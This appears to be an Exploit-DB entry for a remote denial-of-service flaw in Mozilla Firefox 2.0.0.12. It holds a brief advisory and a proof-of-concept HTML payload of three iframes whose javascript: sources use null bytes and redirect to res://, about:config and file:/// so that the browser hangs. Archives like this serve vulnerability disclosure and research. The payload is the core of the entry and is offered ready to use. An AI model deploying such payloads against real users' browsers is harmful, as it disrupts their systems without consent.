Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service

Author: Carl Hardwick
type: dos
platform: multiple
port: 
date_added: 2008-02-15 
date_updated: 2016-12-23 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comfirefox20012.exe

source: https://www.securityfocus.com/bid/27812/info

Mozilla Firefox is prone to a remote denial-of-service vulnerability because of the way the browser handles IFrames.

Attackers can exploit this issue to make the browser unresponsive and cause denial-of-service conditions.

Firefox 2.0.0.12 is vulnerable; other versions may also be affected.

<iframe id="x" src="javascript:document.location='\x00res://'" width="100%" height="200"></iframe>
<iframe id="y" src="javascript:document.location='\x00about:config'" width="100%" height="200"></iframe>
<iframe id="z" src="javascript:document.location='\x00file:///'" width="100%" height="200"></iframe>